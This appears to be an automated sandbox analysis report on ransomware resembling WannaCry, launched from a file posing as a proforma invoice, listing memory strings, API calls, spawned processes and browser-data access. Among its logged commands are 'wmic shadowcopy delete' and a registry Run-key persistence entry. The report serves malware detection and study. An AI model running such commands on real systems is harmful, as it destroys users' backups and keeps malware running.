            Source: taskhsvc.exe, 00000056.00000003.2566815617.0000000004170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k-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-U7s
            Source: taskhsvc.exe, 00000056.00000003.2524836000.00000000036CE000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000002.3019401323.0000000004279000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2527432599.00000000036E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >7:qEmu|Z
            Source: cscript.exe, 00000014.00000003.2294086320.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
            Source: taskhsvc.exe, 00000056.00000003.2566815617.0000000004170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NicOrLu3i8Nj6FXEpkjXMPSd0XRoXSk0LM23zpsw-zVA5gh8dhZDjJfKdmfJAbJoXkj5r6vqtyFLOBP72LBs-zVUhRbFB576Zoq+//2cRviwzokmsDaStPamHpNoSytk-zVZLchQSQ3n45GPrE4OE1ONn+2NYZotd7TitAGFaswc-zV6+LjZBNqpBkaJ0N+sMV3hu6Yng+0C6Q1FUsITpR3Q-zWHJctJq6NyZjNgpbFqtQJADT22J8Cgt9Fv3vKG10ZU-zWHorqDwbKj3vfC0/kOxREH5I3G3oGTazOtYK6iRD/0-zWL6mER384OX1L4/EyGR8lXojhSEZ36IlPSQ3qzHT5k-zWpwcKMEEC5LspkzfoGEx0gABe/tTl2JYP1xc1ua7EY-zYe2hDIF4lqDLTSoTrZVDTcqfD8qyyJYuv5Ama/1sfA-zZziiHRjo5Fkwy6fA2EGn4a8gwH2I+hB8owriI+7A10-zZ5jr8ymS9jyXKTXt8GCgrEzZkXRsqpusLyxhaZ6KwQ-zaD1QRwfXxN9N0CwttQR/dV/IHk5vhVi3EOP8eHwmVo-zbb4BMa9x3vVE140OyLshTGlOowaegQbnpzbtvZ1Twc-zblB/clTUA9xKQ1obHijsSQ9abu/YgGD8P+COznrsIo-zcIHX7/jFzGEty9RZGAF6NzQB6XYB5m+E0Fj87lv8HY-zcfMGfRCb9dMyLhsDyO7Zhb0yn1aWbHqpZuf3Y/N1TQ-zcfmSn92BHt0WiNakHGVGeHmQmTSgI/rWRIPg5H5+Xc-zc1mIL1hJpD/Qk8pAt0U3MYbMqrJ81rzFZcdaSXSXKc-zdAg/PFH7g73OJVdprg+ckrqTds1SAOB8enLWE6q5D8-zdM1E2qYGcEEKc39gscZEJtDfx/dlG7pa2Df7hcs3Ac-zdbyLNjNhCMYv7lAuHHhq1ZjcsbyJlrPLpE83V/fRKA-zeB4u05RG5em2KrM/lTK/n5eJAyDg467g3OEg7ng89M-zeJ0PwXoKv22aBEf639TO9mo9mdSDpeKQHQrGPBomok-zeMcX3gMYHI0vwW4cRJAJNfIvzZvu28ZbDYW7SertkE-zeOOr00uRk3FCCDY46JGxTgfOqKHuoyab7tZrFPePao-zecw0S+ivizCB5udAuHtroxzEiuDqGg3xMM44hWiQVE-zfGhjFYXqB7vEPmJJEXIQoxtbu5BYcoHY3vGDYgcVWw-zfbWvve1W6duZ8aTLpSzP1uxK6tIuBau43KPkBPS8po-zfp/BMkXH9LoS6ajo25wTwwtX4oAWbCVAkHRC5DyZhg-zgh8U51xa3dP+4ixRiPNW4EnCC9aXy+lk+MJr2YKjRs-zg62BB2oixuoiXs1NNlOyPYk5A5fPHrG66z+iuga2TI-zhAa+p1pKFO+/jsyDGsY5ffBaT87Y3t3PmkIwQkQK2c-ziH8gBw/hDRSubPyvtA5xitJFXIbZ+MweRYoaQVrCsk-ziUvaEZZcpN4yruVxgzu3hER9JbEX2wRtktbIBTjS+c-zjvPaRKf62FG146p5Z/pXcxV+bEYjx6zrbX3Z6XXZgM-zlSOoaDLoyiiZKvPbqQzqNpwDZ0b5WLAb28hwxgkkow-zlZ/K4O9sZrnGlY/biWldZ3By29CdYfJxI209LMuUcI-zmpzOp/uUXhjQm+P75sJKHLUSLsxVO6j5AwgsRrzA7Y-znQxPCBeGAUn2knRvwvgwvgNBFE4m7OITQZntrp76PI-znU5WH7W/d0vMsTuRI79QCvHg5TbJ8kFROfiQ3UqJYY-zngEiYcSpNDCOy1F6py9aDM8N3Nx8e4UnCq0fs+ebAM-zoGoKMM5K+9pz7ZcwA+j6bxtPaO6ns7HhXD5vLtx5W0-zopDr0fhd+Hkr/UiTHaEniyXqJRTwYH5smzQH1nYfv4-zpU+z0DPZqqQRsrW4w9GvTfUYyw7MmwkWvXEV4EOSus-zpqonbaz1p2p/LDbKwVkueQWvIRBcwPwpN0TESHgfq0-zpuSSm5bDaL2f+c/xYibjcMDyk3mKQERdNixmXVmcIw-zpubmYS38yOloy5mIejTc6CKhButUEAPMUzbuuKNceA-zqe2E2MUv3dMJ7e+HjIgznS9Nc/3cEVcjtQxTgNcLWY-zrQtEmjYIrB6H7IidkJx+ywjf1SQ7sxqNqKeUQFj4p8-zsd0/lVS4XMU0We5oq/f1kjMFiocArNBrYIl3frOHCY-zsjFKL1zTXYNTRCTpIWL+clK9RwHX03rYFgXjoniSXg-ztfJIyhs2j7/K2F6MhauREhFK/nBnDvQp+/HeOknsAo-zt1ATORXAy0uShor2XcYD+bMdk73OsIR95JBkrcoF88-zuLj/FAyj3aNGr0/X/0gWxQAKzEPiWPKP+oCbL3djWQ-zvYKvfxuxINewsFi++sJn4yr3U1sTKcpfXgS4YibQm0-zvYkkse1ibLr7aHb6fp7Yop+vr9lr93JhyJlIK7MByA-zwCCWQtpBVkbsYMtFFC0zScR7Z0tWbQTusP3uvLmOA0-zwC0cPVpQo+w3PtIYvK1S0etGRCLa0RrpAriA0sdmP8-zwSl6rtSQpGOTOBBgXR1QpsEoWBkaWe7k4BmOPwJGa0-zw1XErFy0TxyFz1LJ9ZiNVcA5il3/N28IBC6UoxltdE-zw2fW0v3kp406OW3iyazTabS1irDcxzAzSD52SDo7yg-zw+NwdECaQHlawm5fBQ9sw84UXZK1CGky0EQAwoMH2I-zxtIpVMd1XHWCXqIhKsS0VxZg04WDjdRSAFAgPEpUaU-zxwOx+cYWlUTVE2MKJipM+46pibBf3+FjXhV0plOWYw-z0Oibg+fdhG+ZeGdf81jFsuDs7THmaAJKCK5urc95gk-z0UErfrnHrw3QUrevjUvlKwXKIDpaqx2d+SxXHyV88k-z0s7e/QslByDe9W7c+/fWFg0kHkCnLQbEfYe8TT9lwM-z03QpyribGQ
            Source: taskhsvc.exe, 00000056.00000002.3012479815.000000000162E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3004833775.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3005117932.0000000000783000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
            Source: taskhsvc.exe, 00000056.00000003.2566815617.0000000004170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !NicOrLu3i8Nj6FXEpkjXMPSd0XRoXSk0LM23zpsw-zVA5gh8dhZDjJfKdmfJAbJoXkj5r6vqtyFLOBP72LBs-zVUhRbFB576Zoq+//2cRviwzokmsDaStPamHpNoSytk-zVZLchQSQ3n45GPrE4OE1ONn+2NYZotd7TitAGFaswc-zV6+LjZBNqpBkaJ0N+sMV3hu6Yng+0C6Q1FUsITpR3Q-zWHJctJq6NyZjNgpbFqtQJADT22J8Cgt9Fv3vKG10ZU-zWHorqDwbKj3vfC0/kOxREH5I3G3oGTazOtYK6iRD/0-zWL6mER384OX1L4/EyGR8lXojhSEZ36IlPSQ3qzHT5k-zWpwcKMEEC5LspkzfoGEx0gABe/tTl2JYP1xc1ua7EY-zYe2hDIF4lqDLTSoTrZVDTcqfD8qyyJYuv5Ama/1sfA-zZziiHRjo5Fkwy6fA2EGn4a8gwH2I+hB8owriI+7A10-zZ5jr8ymS9jyXKTXt8GCgrEzZkXRsqpusLyxhaZ6KwQ-zaD1QRwfXxN9N0CwttQR/dV/IHk5vhVi3EOP8eHwmVo-zbb4BMa9x3vVE140OyLshTGlOowaegQbnpzbtvZ1Twc-zblB/clTUA9xKQ1obHijsSQ9abu/YgGD8P+COznrsIo-zcIHX7/jFzGEty9RZGAF6NzQB6XYB5m+E0Fj87lv8HY-zcfMGfRCb9dMyLhsDyO7Zhb0yn1aWbHqpZuf3Y/N1TQ-zcfmSn92BHt0WiNakHGVGeHmQmTSgI/rWRIPg5H5+Xc-zc1mIL1hJpD/Qk8pAt0U3MYbMqrJ81rzFZcdaSXSXKc-zdAg/PFH7g73OJVdprg+ckrqTds1SAOB8enLWE6q5D8-zdM1E2qYGcEEKc39gscZEJtDfx/dlG7pa2Df7hcs3Ac-zdbyLNjNhCMYv7lAuHHhq1ZjcsbyJlrPLpE83V/fRKA-zeB4u05RG5em2KrM/lTK/n5eJAyDg467g3OEg7ng89M-zeJ0PwXoKv22aBEf639TO9mo9mdSDpeKQHQrGPBomok-zeMcX3gMYHI0vwW4cRJAJNfIvzZvu28ZbDYW7SertkE-zeOOr00uRk3FCCDY46JGxTgfOqKHuoyab7tZrFPePao-zecw0S+ivizCB5udAuHtroxzEiuDqGg3xMM44hWiQVE-zfGhjFYXqB7vEPmJJEXIQoxtbu5BYcoHY3vGDYgcVWw-zfbWvve1W6duZ8aTLpSzP1uxK6tIuBau43KPkBPS8po-zfp/BMkXH9LoS6ajo25wTwwtX4oAWbCVAkHRC5DyZhg-zgh8U51xa3dP+4ixRiPNW4EnCC9aXy+lk+MJr2YKjRs-zg62BB2oixuoiXs1NNlOyPYk5A5fPHrG66z+iuga2TI-zhAa+p1pKFO+/jsyDGsY5ffBaT87Y3t3PmkIwQkQK2c-ziH8gBw/hDRSubPyvtA5xitJFXIbZ+MweRYoaQVrCsk-ziUvaEZZcpN4yruVxgzu3hER9JbEX2wRtktbIBTjS+c-zjvPaRKf62FG146p5Z/pXcxV+bEYjx6zrbX3Z6XXZgM-zlSOoaDLoyiiZKvPbqQzqNpwDZ0b5WLAb28hwxgkkow-zlZ/K4O9sZrnGlY/biWldZ3By29CdYfJxI209LMuUcI-zmpzOp/uUXhjQm+P75sJKHLUSLsxVO6j5AwgsRrzA7Y-znQxPCBeGAUn2knRvwvgwvgNBFE4m7OITQZntrp76PI-znU5WH7W/d0vMsTuRI79QCvHg5TbJ8kFROfiQ3UqJYY-zngEiYcSpNDCOy1F6py9aDM8N3Nx8e4UnCq0fs+ebAM-zoGoKMM5K+9pz7ZcwA+j6bxtPaO6ns7HhXD5vLtx5W0-zopDr0fhd+Hkr/UiTHaEniyXqJRTwYH5smzQH1nYfv4-zpU+z0DPZqqQRsrW4w9GvTfUYyw7MmwkWvXEV4EOSus-zpqonbaz1p2p/LDbKwVkueQWvIRBcwPwpN0TESHgfq0-zpuSSm5bDaL2f+c/xYibjcMDyk3mKQERdNixmXVmcIw-zpubmYS38yOloy5mIejTc6CKhButUEAPMUzbuuKNceA-zqe2E2MUv3dMJ7e+HjIgznS9Nc/3cEVcjtQxTgNcLWY-zrQtEmjYIrB6H7IidkJx+ywjf1SQ7sxqNqKeUQFj4p8-zsd0/lVS4XMU0We5oq/f1kjMFiocArNBrYIl3frOHCY-zsjFKL1zTXYNTRCTpIWL+clK9RwHX03rYFgXjoniSXg-ztfJIyhs2j7/K2F6MhauREhFK/nBnDvQp+/HeOknsAo-zt1ATORXAy0uShor2XcYD+bMdk73OsIR95JBkrcoF88-zuLj/FAyj3aNGr0/X/0gWxQAKzEPiWPKP+oCbL3djWQ-zvYKvfxuxINewsFi++sJn4yr3U1sTKcpfXgS4YibQm0-zvYkkse1ibLr7aHb6fp7Yop+vr9lr93JhyJlIK7MByA-zwCCWQtpBVkbsYMtFFC0zScR7Z0tWbQTusP3uvLmOA0-zwC0cPVpQo+w3PtIYvK1S0etGRCLa0RrpAriA0sdmP8-zwSl6rtSQpGOTOBBgXR1QpsEoWBkaWe7k4BmOPwJGa0-zw1XErFy0TxyFz1LJ9ZiNVcA5il3/N28IBC6UoxltdE-zw2fW0v3kp406OW3iyazTabS1irDcxzAzSD52SDo7yg-zw+NwdECaQHlawm5fBQ9sw84UXZK1CGky0EQAwoMH2I-zxtIpVMd1XHWCXqIhKsS0VxZg04WDjdRSAFAgPEpUaU-zxwOx+cYWlUTVE2MKJipM+46pibBf3+FjXhV0plOWYw-z0Oibg+fdhG+ZeGdf81jFsuDs7THmaAJKCK5urc95gk-z0UErfrnHrw3QUrevjUvlKwXKIDpaqx2d+SxXHyV88k-z0s7e/QslByDe9W7c+/fWFg0kHkCnLQbEfYe8TT9lwM-z03QpyribG
            Source: cached-microdesc-consensus.tmp.86.drBinary or memory string: m zpuSSm5bDaL2f+c/xYibjcMDyk3mKQERdNixmXVmcIw
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,10_2_100011D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72C70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CD72C70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72C6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CD72C6C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDE02FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CDE02FC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDE0300 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CDE0300
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,10_2_10001360
            Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72BC0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,86_2_6CD72BC0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,KiUserCallbackDispatcher,swprintf,CopyFileW,10_2_10004F20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\~SD951B.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\~SD94CC.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\~SD94C6.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SD94A0.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\~SD94FF.tmpJump to behavior
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\~SD94D1.tmpJump to behavior
